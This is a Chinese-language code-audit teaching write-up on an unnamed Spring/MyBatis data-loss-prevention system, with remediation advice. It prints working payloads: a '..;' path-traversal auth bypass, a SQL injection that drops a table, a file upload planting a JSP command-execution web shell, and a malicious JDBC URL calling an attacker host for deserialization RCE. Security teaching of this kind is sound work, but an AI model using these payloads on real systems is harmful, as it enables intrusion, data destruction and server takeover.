某数据泄露防护系统审计教学文档<\/h1>

一、系统架构分析<\/h2>

1.1 技术栈组成<\/h3>

框架类型<\/strong>：MVC架构<\/li>
核心框架<\/strong>：Spring Framework<\/li>
版本信息<\/strong>：Spring 4.3.29<\/li>
路由模式<\/strong>：*.do后缀形式<\/li>
ORM框架<\/strong>：MyBatis<\/li>

文件上传<\/strong>：MultipartFile组件<\/li> <\/ul>
1.2 依赖库分析<\/h3>

序列化相关<\/strong>：

Commons BeanUtils 1.9.3<\/li>
Commons Collections 3.2.2<\/li> <\/ul> <\/li>
JSON处理<\/strong>：Fastjson（高版本，无法直接利用反序列化）<\/li>
数据库驱动<\/strong>：MySQL 8.0.15<\/li> <\/ul>
1.3 安全防护机制<\/h3>

鉴权方式<\/strong>：Spring Security Filter Chain + JWT组合认证<\/li>
过滤配置<\/strong>：所有*.do路由均经过安全过滤<\/li> <\/ul>
二、鉴权绕过技术分析<\/h2>
2.1 路径解析绕过<\/h3>
2.1.1 漏洞位置<\/h4>

过滤类<\/strong>：SecurityFilter#doFilter<\/li>
校验方法<\/strong>：SessionFilter.isNoNeedValidate<\/li> <\/ul>
2.1.2 绕过原理<\/h4>
系统对URL路径解析处理不当，存在目录遍历绕过漏洞：<\/p>
GET<\/span> \/login.jsp\/..;\/admin\/secretEndpoint.do HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span><\/code><\/pre>2.1.3 技术细节<\/h4> 利用\/..;\/<\/code>实现路径标准化绕过<\/li> 绕过后直接访问后台功能端点<\/li> 所有需要鉴权的接口变为前台可访问<\/li> <\/ul> 2.2 JWT伪造尝试分析<\/h3> 2.2.1 JWT处理流程<\/h4> 从Authorization头获取token<\/li> RC4算法解密token<\/li> HMAC256签名验证<\/li> <\/ol> 2.2.2 密钥硬编码发现<\/h4> 密钥存储<\/strong>：JWTUtils类中存在硬编码SECRET<\/li> 生成方法<\/strong>：标准JWT生成方式<\/li> <\/ul> 2.2.3 伪造失败原因<\/h4> 签名时除SECRET外还添加了动态参数：<\/p> Config.<\/span>SYSTEM_USER_NUMBER<\/span> \/\/ 系统唯一标识，各部署环境不同 <\/span><\/span><\/span><\/code><\/pre>导致无法跨系统伪造有效JWT令牌。<\/p> 三、漏洞挖掘与利用技术<\/h2> 3.1 SQL注入漏洞（9处）<\/h3> 3.1.1 漏洞成因<\/h4> 使用方式<\/strong>：MyBatis中使用了${}进行SQL拼接<\/li> 漏洞位置<\/strong>：PageVo类中的sort参数拼接<\/li> <\/ul> 3.1.2 代码分析<\/h4> <\/span> <\/span><\/span><select<\/span> id=<\/span>"queryList"<\/span> parameterType=<\/span>"PageVo"<\/span>><\/span> <\/span><\/span> SELECT * FROM table ORDER BY ${page.sortField} <\/span><\/span><\/select><\/span> <\/span><\/span><\/code><\/pre>3.1.3 利用方式<\/h4> 构造恶意sort参数实现注入：<\/p> POST<\/span> \/queryData.do HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Content-Type:<\/span> application\/json<\/span> <\/span><\/span> <\/span><\/span>{ <\/span><\/span> "sortField"<\/span>: "id; DROP TABLE users; --"<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.1.4 挖掘方法<\/h4> 全局搜索${<\/code>查找MyBatis中的SQL拼接点。<\/p> 3.2 任意文件上传漏洞<\/h3> 3.2.1 漏洞位置<\/h4> 接收参数<\/strong>：MultipartFile类型参数<\/li> 处理方法<\/strong>：uploadWxFileToRoot<\/li> <\/ul> 3.2.2 漏洞详情<\/h4> public<\/span> String uploadWxFileToRoot<\/span>(<\/span>MultipartFile file)<\/span> {<\/span> <\/span><\/span> \/\/ 无后缀过滤 <\/span><\/span><\/span><\/span> String path =<\/span> String.<\/span>valueOf<\/span>(<\/span>System.<\/span>getProperty<\/span>(<\/span>"catalina.home"<\/span>))<\/span> <\/span><\/span> +<\/span> File.<\/span>separator<\/span> +<\/span> "webapps"<\/span> <\/span><\/span> +<\/span> File.<\/span>separator<\/span> +<\/span> "ROOT"<\/span> <\/span><\/span> +<\/span> File.<\/span>separator<\/span> +<\/span> file.<\/span>getOriginalFilename<\/span>();<\/span> <\/span><\/span> file.<\/span>transferTo<\/span>(<\/span>new<\/span> File(<\/span>path));<\/span> <\/span><\/span> return<\/span> path;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.2.3 利用方法<\/h4> POST<\/span> \/uploadFile.do HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Content-Type:<\/span> multipart\/form-data<\/span> <\/span><\/span> <\/span><\/span>------WebKitFormBoundary7MA4YWxkTrZu0gW <\/span><\/span>Content-Disposition: form-data; name="file"; filename="shell.jsp" <\/span><\/span>Content-Type: application\/octet-stream <\/span><\/span> <\/span><\/span><% Runtime.getRuntime().exec(request.getParameter("cmd")); %> <\/span><\/span>------WebKitFormBoundary7MA4YWxkTrZu0gW-- <\/span><\/span><\/code><\/pre>3.3 JDBC反序列化漏洞<\/h3> 3.3.1 漏洞环境<\/h4> MySQL版本<\/strong>：8.0.15<\/li> 依赖链<\/strong>：CB链（Commons BeanUtils + Commons Collections）<\/li> <\/ul> 3.3.2 利用技巧<\/h4> 利用JDBC连接字符串中的注释特性绕过限制：<\/p> String url =<\/span> "jdbc:mysql:\/\/attacker-controlled.com:3306\/test?"<\/span> <\/span><\/span> +<\/span> "autoDeserialize=true&statementInterceptors="<\/span> <\/span><\/span> +<\/span> "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor"<\/span> <\/span><\/span> +<\/span> "#&user=deserialization_payload_here"<\/span>;<\/span> <\/span><\/span><\/code><\/pre>3.3.3 技术要点<\/h4> 使用#<\/code>注释掉后续参数避免语法错误<\/li> 结合CB链实现RCE<\/li> <\/ul> 四、审计方法论总结<\/h2> 4.1 系统化审计流程<\/h3> 架构分析<\/strong>：梳理技术栈和依赖版本<\/li> 鉴权分析<\/strong>：从web.xml入手分析过滤链<\/li> 入口挖掘<\/strong>：寻找用户输入可控点<\/li> 漏洞验证<\/strong>：本地环境构造验证Payload<\/li> <\/ol> 4.2 关键检查点<\/h3> XML配置<\/strong>：web.xml中的filter-mapping<\/li> 注解使用<\/strong>：@RequestMapping等路由注解<\/li> 参数接收<\/strong>：Controller方法参数列表<\/li> SQL处理<\/strong>：MyBatis中${}的使用情况<\/li> 文件操作<\/strong>：文件路径拼接和校验逻辑<\/li> <\/ul> 4.3 开发安全建议<\/h3> 避免使用${}进行SQL拼接<\/li> 对上传文件进行后缀白名单校验<\/li> 使用标准化路径处理避免解析绕过<\/li> JWT密钥应避免硬编码，使用动态密钥管理<\/li> <\/ol> 五、修复方案<\/h2> 5.1 紧急修复措施<\/h3> 添加路径标准化处理过滤器<\/li> 临时禁用存在SQL注入的接口<\/li> 限制文件上传目录为非web可访问路径<\/li> <\/ol> 5.2 长期加固方案<\/h3> 升级Spring Security到最新版本<\/li> 实施严格的输入验证和输出编码<\/li> 部署WAF防护常见Web攻击<\/li> 建立定期安全审计机制<\/li> <\/ol> 注：本文档仅用于安全研究和教育目的，请勿用于非法用途。所有漏洞信息已提交给相关厂商并完成修复。<\/em><\/p>